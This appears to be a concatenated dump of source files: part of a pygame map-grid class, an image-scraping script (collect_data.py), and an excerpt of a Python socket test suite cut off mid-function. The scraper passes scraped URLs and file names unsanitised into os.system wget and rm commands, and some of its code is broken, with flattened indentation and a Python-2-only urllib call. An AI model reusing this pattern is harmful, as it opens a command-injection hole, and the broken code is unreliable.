                square.fetch_map()
                square.position = (100 * x, 100 * y)
                self._grid.append(square)

    def fetch_outwards(self):
        """Create and fetch an 8x4 block of tiles centred on the grid."""
        for x in range(-4, 4):
            for y in range(-2, 2):
                square = MapSquare(
                    86,
                    (
                        self._starting_position[0] + (self._delta * x),
                        self._starting_position[1] - (self._delta * y)
                    ),
                    self
                )
                square.fetch_map()
                # Position tiles relative to the grid centre (86px tiles,
                # half-tile offset of 43 keeps the grid centred).
                square.position = ((86 * x) + (self.dimensions[0] / 2) - 43, (86 * y) + (self.dimensions[1] / 2) - 43)
                self._grid.append(square)

    def draw_tags(self):
        """Aggregate tags from all tiles and draw known amenity icons + labels."""
        self.tags = {}
        for square in self._grid:
            self.tags.update(square.tags)
        self._tag_surface.fill((0, 0, 0))
        for name in self.tags:
            if self.tags[name][2] not in settings.AMENITIES:
                # BUG FIX: unknown amenities previously fell through and reused
                # the icon from the prior iteration (NameError on the first tag).
                continue
            # BUG FIX: transform.scale returns a new surface; the original
            # discarded the result and blitted the unscaled icon.
            image = pygame.transform.scale(settings.AMENITIES[self.tags[name][2]], (10, 10))
            self.image.blit(image, (self.tags[name][0], self.tags[name][1]))
            text = settings.RobotoB[12].render(name, True, (settings.bright), (0, 0, 0))
            self.image.blit(text, (self.tags[name][0] + 17, self.tags[name][1] + 4))

    def redraw_map(self, *args, **kwargs):
        """Recomposite every tile's surface, then overlay the tag layer."""
        self.image.fill((0, 0, 0))
        for square in self._grid:
            self.image.blit(square._map_surface, square.position)
        self.draw_tags()
|
collect_data.py
|
import os
import re
import subprocess
import urllib
import urllib.request
from multiprocessing import Process
# Image extensions we keep; anything else is skipped.
SUPPORTED_FORMATS = ['jpg', 'png', 'jpeg']
# Image-search URL; `pn` (index) selects the result page offset.
URL_TEMPLATE = r'http://image.b***u.com/search/flip?tn=b***uimage&ie=utf-8&word={keyword}&pn={index}'
def download_images_from_b***u(dir_name, keyword, start_index, end_index):
index = start_index
while index < end_index:
url = URL_TEMPLATE.format(keyword=keyword, index=index)
try:
html_text = urllib.urlopen(url).read().decode('utf-8', 'ignore')
image_urls = re.findall(r'"objURL":"(.*?)"', html_text)
if not image_urls:
print('Cannot retrieve anymore image urls \nStopping ...'.format(url))
break
except IOError as e:
print(e)
print('Cannot open {}. \nStopping ...'.format(url))
break
downloaded_urls = []
for url in image_urls:
filename = url.split('/')[-1]
ext = filename[filename.rfind('.')+1:]
if ext.lower() not in SUPPORTED_FORMATS:
index += 1
continue
filename = '{}/{:0>6d}.{}'.format(dir_name, index, ext)
cmd = 'wget "{}" -t 3 -T 5 -O {}'.format(url, filename)
os.system(cmd)
if os.path.exists(filename) and os.path.getsize(filename) > 1024:
index_url = '{:0>6d},{}'.format(index, url)
downloaded_urls.append(index_url)
else:
os.system('rm {}'.format(filename))
index += 1
if index >= end_index:
break
with open('{}_urls.txt'.format(dir_name), 'a') as furls:
urls_text = '{}\n'.format('\n'.join(downloaded_urls))
if len(urls_text) > 11:
furls.write(urls_text)
def download_images(keywords, num_per_kw, procs_per_kw):
args_list = []
for class_id, keyword in enumerate(keywords):
dir_name = '{:0>3d}'.format(class_id)
os.system('mkdir -p {}'.format(dir_name))
num_per_proc = int(round(float(num_per_kw/procs_per_kw)))
for i in range(procs_per_kw):
start_index = i * num_per_proc
end_index = start_index + num_per_proc - 1
args_list.append((dir_name, keyword, start_index, end_index))
processes = [Process(target=download_images_from_b***u, args=x) for x in args_list]
print('Starting to download images with {} processes ...'.format(len(processes)))
for p in processes:
p.start()
for p in processes:
p.join()
print('Done!')
if __name__ == "__main__":
    # BUG FIX: reading in binary mode yielded bytes keywords, which would be
    # formatted into the request URL as "b'...'"; read as text instead.
    with open('keywords.txt', encoding='utf-8') as f:
        foods = f.read().split()
    download_images(foods, 2000, 3)
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
# Fixed port used by the AF_VSOCK stream tests.
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
# The C accelerator module may be missing on some builds.
try:
    import _socket
except ImportError:
    _socket = None
def get_cid():
    """Return the local VSOCK context ID, or None when unavailable."""
    if fcntl is None:
        return None
    try:
        with open("/dev/vsock", "rb") as dev:
            raw = fcntl.ioctl(dev, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, "    ")
    except OSError:
        return None
    return struct.unpack("I", raw)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
    """Check whether AF_VSOCK sockets are supported on this host."""
    # VSOCK support is usable iff a local CID can be obtained.
    return get_cid() is not None
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
    """Temporarily set the module-wide default socket timeout."""
    saved = socket.getdefaulttimeout()
    socket.setdefaulttimeout(timeout)
    try:
        yield
    finally:
        # Always restore the previous default, even if the body raised.
        socket.setdefaulttimeout(saved)
# Feature probes evaluated once at import time; used by skip decorators below.
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
    """Base fixture: a listening TCP server socket bound to an ephemeral port."""
    def setUp(self):
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # bind_port picks a free port and binds self.serv to it.
        self.port = support.bind_port(self.serv)
        self.serv.listen()
    def tearDown(self):
        self.serv.close()
        self.serv = None  # drop the reference so accidental reuse fails loudly
class SocketUDPTest(unittest.TestCase):
    """Base fixture: a UDP server socket bound to an ephemeral port."""
    def setUp(self):
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.port = support.bind_port(self.serv)
    def tearDown(self):
        self.serv.close()
        self.serv = None  # drop the reference so accidental reuse fails loudly
class ThreadSafeCleanupTestCase(unittest.TestCase):
    """Subclass of unittest.TestCase with thread-safe cleanup methods.
    This subclass protects the addCleanup() and doCleanups() methods
    with a recursive lock.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # RLock so a cleanup callback may itself register further cleanups.
        self._cleanup_lock = threading.RLock()
    def addCleanup(self, *args, **kwargs):
        with self._cleanup_lock:
            return super().addCleanup(*args, **kwargs)
    def doCleanups(self, *args, **kwargs):
        with self._cleanup_lock:
            return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
    """To be able to run this test, a `vcan0` CAN interface can be created with
    the following commands:
    # modprobe vcan
    # ip link add dev vcan0 type vcan
    # ifconfig vcan0 up
    """
    interface = 'vcan0'
    bufsize = 128
    """The CAN frame structure is defined in <linux/can.h>:
    struct can_frame {
    canid_t can_id;  /* 32 bit CAN_ID + EFF/RTR/ERR flags */
    __u8    can_dlc; /* data length code: 0 .. 8 */
    __u8    data[8] __attribute__((aligned(8)));
    };
    """
    can_frame_fmt = "=IB3x8s"
    can_frame_size = struct.calcsize(can_frame_fmt)
    """The Broadcast Management Command frame structure is defined
    in <linux/can/bcm.h>:
    struct bcm_msg_head {
    __u32 opcode;
    __u32 flags;
    __u32 count;
    struct timeval ival1, ival2;
    canid_t can_id;
    __u32 nframes;
    struct can_frame frames[0];
    }
    `bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
    `struct can_frame` definition). Must use native not standard types for packing.
    """
    bcm_cmd_msg_fmt = "@3I4l2I"
    # Pad the struct out to an 8-byte multiple for the alignment noted above.
    bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
    def setUp(self):
        self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
        self.addCleanup(self.s.close)
        try:
            self.s.bind((self.interface,))
        except OSError:
            # No vcan0 on this machine: skip rather than fail.
            self.skipTest('network interface `%s` does not exist' %
                          self.interface)
class SocketRDSTest(unittest.TestCase):
    """To be able to run this test, the `rds` kernel module must be loaded:
    # modprobe rds
    """
    bufsize = 8192
    def setUp(self):
        self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
        self.addCleanup(self.serv.close)
        try:
            self.port = support.bind_port(self.serv)
        except OSError:
            # rds module not loaded: skip rather than fail.
            self.skipTest('unable to bind RDS socket')
class ThreadableTest:
    """Threadable Test class
    The ThreadableTest class makes it easy to create a threaded
    client/server pair from an existing unit test. To create a
    new threaded class from an existing unit test, use multiple
    inheritance:
    class NewClass (OldClass, ThreadableTest):
    pass
    This class defines two new fixture functions with obvious
    purposes for overriding:
    clientSetUp ()
    clientTearDown ()
    Any new test functions within the class must then define
    tests in pairs, where the test name is preceded with a
    '_' to indicate the client portion of the test. Ex:
    def testFoo(self):
    # Server portion
    def _testFoo(self):
    # Client portion
    Any exceptions raised by the clients during their tests
    are caught and transferred to the main thread to alert
    the testing framework.
    Note, the server setup function cannot call any blocking
    functions that rely on the client thread during setup,
    unless serverExplicitReady() is called just before
    the blocking call (such as in setting up a client/server
    connection and performing the accept() in setUp().
    """
    def __init__(self):
        # Swap the true setup function
        self.__setUp = self.setUp
        self.__tearDown = self.tearDown
        self.setUp = self._setUp
        self.tearDown = self._tearDown
    def serverExplicitReady(self):
        """This method allows the server to explicitly indicate that
        it wants the client thread to proceed. This is useful if the
        server is about to execute a blocking routine that is
        dependent upon the client thread during its setup routine."""
        self.server_ready.set()
    def _setUp(self):
        self.wait_threads = support.wait_threads_exit()
        self.wait_threads.__enter__()
        # Handshake events between server (main) and client threads.
        self.server_ready = threading.Event()
        self.client_ready = threading.Event()
        self.done = threading.Event()
        # Single-slot queue used to ferry client-side exceptions to the
        # main thread where they can be re-raised.
        self.queue = queue.Queue(1)
        self.server_crashed = False
        # Do some munging to start the client test.
        methodname = self.id()
        i = methodname.rfind('.')
        methodname = methodname[i+1:]
        test_method = getattr(self, '_' + methodname)
        self.client_thread = thread.start_new_thread(
            self.clientRun, (test_method,))
        try:
            self.__setUp()
        except:
            # Record the failure so the client side bails out too.
            self.server_crashed = True
            raise
        finally:
            self.server_ready.set()
        self.client_ready.wait()
    def _tearDown(self):
        self.__tearDown()
        self.done.wait()
        self.wait_threads.__exit__(None, None, None)
        # Re-raise any exception the client thread queued.
        if self.queue.qsize():
            exc = self.queue.get()
            raise exc
    def clientRun(self, test_func):
        # Runs in the client thread: wait for server, set up, run the
        # paired '_test*' method, and forward failures via the queue.
        self.server_ready.wait()
        try:
            self.clientSetUp()
        except BaseException as e:
            self.queue.put(e)
            self.clientTearDown()
            return
        finally:
            self.client_ready.set()
        if self.server_crashed:
            self.clientTearDown()
            return
        if not hasattr(test_func, '__call__'):
            raise TypeError("test_func must be a callable function")
        try:
            test_func()
        except BaseException as e:
            self.queue.put(e)
        finally:
            self.clientTearDown()
    def clientSetUp(self):
        raise NotImplementedError("clientSetUp must be implemented.")
    def clientTearDown(self):
        self.done.set()
        thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
    """TCP server fixture plus a client socket in a second thread."""
    def __init__(self, methodName='runTest'):
        SocketTCPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)
    def clientSetUp(self):
        self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
    """UDP server fixture plus a client socket in a second thread."""
    def __init__(self, methodName='runTest'):
        SocketUDPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)
    def clientSetUp(self):
        self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
    """CAN server fixture plus a client CAN socket in a second thread."""
    def __init__(self, methodName='runTest'):
        SocketCANTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)
    def clientSetUp(self):
        self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
        try:
            self.cli.bind((self.interface,))
        except OSError:
            # skipTest should not be called here, and will be called in the
            # server instead
            pass
    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
    """RDS server fixture plus a bound client RDS socket in a second thread."""
    def __init__(self, methodName='runTest'):
        SocketRDSTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)
    def clientSetUp(self):
        self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
        try:
            # RDS sockets must be bound explicitly to send or receive data
            self.cli.bind((HOST, 0))
            self.cli_addr = self.cli.getsockname()
        except OSError:
            # skipTest should not be called here, and will be called in the
            # server instead
            pass
    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
          'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
          "This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
    """Guest-side VSOCK stream test: server accepts, client connects by CID."""
    def __init__(self, methodName='runTest'):
        unittest.TestCase.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)
    def setUp(self):
        self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
        self.addCleanup(self.serv.close)
        self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
        self.serv.listen()
        # accept() blocks on the client thread, so signal readiness first.
        self.serverExplicitReady()
        self.conn, self.connaddr = self.serv.accept()
        self.addCleanup(self.conn.close)
    def clientSetUp(self):
        time.sleep(0.1)
        self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
        self.addCleanup(self.cli.close)
        cid = get_cid()
        self.cli.connect((cid, VSOCKPORT))
    def testStream(self):
        msg = self.conn.recv(1024)
        self.assertEqual(msg, MSG)
    def _testStream(self):
        self.cli.send(MSG)
        self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
    """Socket tests for client-server connection.
    self.cli_conn is a client socket connected to the server. The
    setUp() method guarantees that it is connected to the server.
    """
    def __init__(self, methodName='runTest'):
        ThreadedTCPSocketTest.__init__(self, methodName=methodName)
    def setUp(self):
        ThreadedTCPSocketTest.setUp(self)
        # Indicate explicitly we're ready for the client thread to
        # proceed and then perform the blocking call to accept
        self.serverExplicitReady()
        conn, addr = self.serv.accept()
        self.cli_conn = conn
    def tearDown(self):
        self.cli_conn.close()
        self.cli_conn = None
        ThreadedTCPSocketTest.tearDown(self)
    def clientSetUp(self):
        ThreadedTCPSocketTest.clientSetUp(self)
        self.cli.connect((HOST, self.port))
        # serv_conn is the client's view of the established connection.
        self.serv_conn = self.cli
    def clientTearDown(self):
        self.serv_conn.close()
        self.serv_conn = None
        ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
    """Fixture built on socketpair(): serv/cli are the two ends of one pair."""
    def __init__(self, methodName='runTest'):
        unittest.TestCase.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)
    def setUp(self):
        self.serv, self.cli = socket.socketpair()
    def tearDown(self):
        self.serv.close()
        self.serv = None
    def clientSetUp(self):
        # Nothing to do: the client end was created in setUp().
        pass
    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
    """A base class for socket tests.
    Subclasses must provide methods newSocket() to return a new socket
    and bindSock(sock) to bind it to an unused address.
    Creates a socket self.serv and sets self.serv_addr to its address.
    """
    def setUp(self):
        self.serv = self.newSocket()
        self.bindServer()
    def bindServer(self):
        """Bind server socket and set self.serv_addr to its address."""
        self.bindSock(self.serv)
        self.serv_addr = self.serv.getsockname()
    def tearDown(self):
        self.serv.close()
        self.serv = None  # drop the reference so accidental reuse fails loudly
class SocketListeningTestMixin(SocketTestBase):
    """Mixin to listen on the server socket."""
    def setUp(self):
        super().setUp()
        # Server socket is bound by the base class; start listening here.
        self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
                              ThreadableTest):
    """Mixin to add client socket and allow client/server tests.
    Client socket is self.cli and its address is self.cli_addr. See
    ThreadableTest for usage information.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        ThreadableTest.__init__(self)
    def clientSetUp(self):
        self.cli = self.newClientSocket()
        self.bindClient()
    def newClientSocket(self):
        """Return a new socket for use as client."""
        return self.newSocket()
    def bindClient(self):
        """Bind client socket and set self.cli_addr to its address."""
        self.bindSock(self.cli)
        self.cli_addr = self.cli.getsockname()
    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
                               ThreadedSocketTestMixin):
    """Mixin to allow client/server stream tests with connected client.
    Server's socket representing connection to client is self.cli_conn
    and client's connection to server is self.serv_conn. (Based on
    SocketConnectedTest.)
    """
    def setUp(self):
        super().setUp()
        # Indicate explicitly we're ready for the client thread to
        # proceed and then perform the blocking call to accept
        self.serverExplicitReady()
        conn, addr = self.serv.accept()
        self.cli_conn = conn
    def tearDown(self):
        self.cli_conn.close()
        self.cli_conn = None
        super().tearDown()
    def clientSetUp(self):
        super().clientSetUp()
        self.cli.connect(self.serv_addr)
        self.serv_conn = self.cli
    def clientTearDown(self):
        try:
            self.serv_conn.close()
            self.serv_conn = None
        except AttributeError:
            # clientSetUp() may have failed before serv_conn was assigned.
            pass
        super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
    """Base class for Unix-domain socket tests."""
    # This class is used for file descriptor passing tests, so we
    # create the sockets in a private directory so that other users
    # can't send anything that might be problematic for a privileged
    # user running the tests.
    def setUp(self):
        self.dir_path = tempfile.mkdtemp()
        self.addCleanup(os.rmdir, self.dir_path)
        super().setUp()
    def bindSock(self, sock):
        # Bind to a fresh path inside the private directory; remove on exit.
        path = tempfile.mktemp(dir=self.dir_path)
        support.bind_unix_socket(sock, path)
        self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
    """Base class for Unix-domain SOCK_STREAM tests."""
    def newSocket(self):
        return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
    """Base class for IPv4 socket tests."""
    host = HOST
    def setUp(self):
        super().setUp()
        # Convenience: expose the bound port separately from serv_addr.
        self.port = self.serv_addr[1]
    def bindSock(self, sock):
        support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
    """Base class for TCP-over-IPv4 tests."""
    def newSocket(self):
        return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
    """Base class for UDP-over-IPv4 tests."""
    def newSocket(self):
        return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
    """Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
    def newSocket(self):
        return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
                             socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
    """Base class for IPv6 socket tests."""
    host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
    """Base class for UDP-over-IPv6 tests."""
    def newSocket(self):
        return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
    """Skip decorated test if condition is true, add client_skip decorator.
    If the decorated object is not a class, sets its attribute
    "client_skip" to a decorator which will return an empty function
    if the test is to be skipped, or the original function if it is
    not. This can be used to avoid running the client part of a
    skipped test when using ThreadableTest.
    """
    def client_pass(*args, **kwargs):
        pass
    def skip_decorator(obj):
        decorated = unittest.skip(reason)(obj)
        if not isinstance(obj, type):
            # Client halves of skipped tests become no-ops.
            decorated.client_skip = lambda f: client_pass
        return decorated
    def passthrough_decorator(obj):
        if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
            obj.client_skip = lambda f: f
        return obj
    if condition:
        return skip_decorator
    return passthrough_decorator
def requireAttrs(obj, *attributes):
    """Skip decorated test if obj is missing any of the given attributes.
    Sets client_skip attribute as skipWithClientIf() does.
    """
    missing = [attr for attr in attributes if not hasattr(obj, attr)]
    reason = "don't have " + ", ".join(missing)
    return skipWithClientIf(missing, reason)
def requireSocket(*args):
    """Skip decorated test if a socket cannot be created with given arguments.
    When an argument is given as a string, will use the value of that
    attribute of the socket module, or skip the test if it doesn't
    exist. Sets client_skip attribute as skipWithClientIf() does.
    """
    err = None
    missing = [obj for obj in args
               if isinstance(obj, str) and not hasattr(socket, obj)]
    if missing:
        err = "don't have " + ", ".join(missing)
    else:
        # Resolve string names to socket-module constants, then probe.
        callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
                    for obj in args]
        try:
            probe = socket.socket(*callargs)
        except OSError as e:
            # XXX: check errno?
            err = str(e)
        else:
            probe.close()
    return skipWithClientIf(
        err is not None,
        "can't create socket({0}): {1}".format(
            ", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
    """sendto() argument errors surface as TypeError with a useful
    message instead of being masked (see issue #10169)."""
    # Testing that sendto doesn't mask failures. See #10169.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    self.addCleanup(s.close)
    s.bind(('', 0))
    sockname = s.getsockname()
    # 2 args
    with self.assertRaises(TypeError) as cm:
        s.sendto('\u2620', sockname)
    self.assertEqual(str(cm.exception),
                     "a bytes-like object is required, not 'str'")
    with self.assertRaises(TypeError) as cm:
        s.sendto(5j, sockname)
    self.assertEqual(str(cm.exception),
                     "a bytes-like object is required, not 'complex'")
    with self.assertRaises(TypeError) as cm:
        s.sendto(b'foo', None)
    self.assertIn('not NoneType',str(cm.exception))
    # 3 args
    with self.assertRaises(TypeError) as cm:
        s.sendto('\u2620', 0, sockname)
    self.assertEqual(str(cm.exception),
                     "a bytes-like object is required, not 'str'")
    with self.assertRaises(TypeError) as cm:
        s.sendto(5j, 0, sockname)
    self.assertEqual(str(cm.exception),
                     "a bytes-like object is required, not 'complex'")
    with self.assertRaises(TypeError) as cm:
        s.sendto(b'foo', 0, None)
    self.assertIn('not NoneType', str(cm.exception))
    with self.assertRaises(TypeError) as cm:
        s.sendto(b'foo', 'bar', sockname)
    self.assertIn('an integer is required', str(cm.exception))
    with self.assertRaises(TypeError) as cm:
        s.sendto(b'foo', None, None)
    self.assertIn('an integer is required', str(cm.exception))
    # wrong number of args
    with self.assertRaises(TypeError) as cm:
        s.sendto(b'foo')
    self.assertIn('(1 given)', str(cm.exception))
    with self.assertRaises(TypeError) as cm:
        s.sendto(b'foo', 0, sockname, 4)
    self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
    """Mission-critical constants must exist (AttributeError otherwise)."""
    names = ['AF_INET']
    if socket.has_ipv6:
        names.append('AF_INET6')
    names += ['SOCK_STREAM', 'SOCK_DGRAM', 'SOCK_RAW',
              'SOCK_RDM', 'SOCK_SEQPACKET',
              'SOL_SOCKET', 'SO_REUSEADDR']
    for name in names:
        getattr(socket, name)
def testCrucialIpProtoConstants(self):
    """Core IPPROTO_* constants must be present."""
    for name in ('IPPROTO_TCP', 'IPPROTO_UDP'):
        getattr(socket, name)
    if socket.has_ipv6:
        socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
    """Windows-only IPPROTO_* constants must be exported."""
    for name in ('IPPROTO_ICLFXBM', 'IPPROTO_ST', 'IPPROTO_CBT',
                 'IPPROTO_IGP', 'IPPROTO_RDP', 'IPPROTO_PGM',
                 'IPPROTO_L2TP', 'IPPROTO_SCTP'):
        getattr(socket, name)
def testHostnameRes(self):
    """Round-trip gethostname/gethostbyname/gethostbyaddr/getfqdn.

    Skips (rather than fails) when local name lookup is not configured.
    """
    hostname = socket.gethostname()
    try:
        ip = socket.gethostbyname(hostname)
    except OSError:
        # Probably name lookup wasn't set up right; skip this test
        self.skipTest('name lookup failure')
    self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
    try:
        hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
    except OSError:
        # Probably a similar problem as above; skip this test
        self.skipTest('name lookup failure')
    all_host_names = [hostname, hname] + aliases
    fqhn = socket.getfqdn(ip)
    # Idiom fix: 'x not in y' instead of 'not x in y' (PEP 8).
    if fqhn not in all_host_names:
        self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
    """Numeric IPv4 address strings resolve to themselves."""
    for numeric in (support.HOSTv4, '10.0.0.1', '255.255.255.255'):
        self.assertEqual(numeric, socket.gethostbyname(numeric))
    # we don't test support.HOSTv6 because there's a chance it doesn't have
    # a matching name entry (e.g. 'ip6-localhost')
    for host in [support.HOSTv4]:
        self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
    """Malformed IP literals should raise OSError from both
    gethostbyname() and gethostbyaddr()."""
    # These are all malformed IP addresses and expected not to resolve to
    # any result. But some ISPs, e.g. AWS, may successfully resolve these
    # IPs.
    explanation = (
        "resolving an invalid IP address did not raise OSError; "
        "can be caused by a broken DNS server"
    )
    for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
                 '1:1:1:1:1:1:1:1:1']:
        with self.assertRaises(OSError, msg=addr):
            socket.gethostbyname(addr)
        with self.assertRaises(OSError, msg=explanation):
            socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
    """sethostname() accepts str and bytes; requires root (else skip).

    The original hostname is restored in the finally block.
    """
    oldhn = socket.gethostname()
    try:
        socket.sethostname('new')
    except OSError as e:
        if e.errno == errno.EPERM:
            self.skipTest("test should be run as root")
        else:
            raise
    try:
        # running test as root!
        self.assertEqual(socket.gethostname(), 'new')
        # Should work with bytes objects too
        socket.sethostname(b'bar')
        self.assertEqual(socket.gethostname(), 'bar')
    finally:
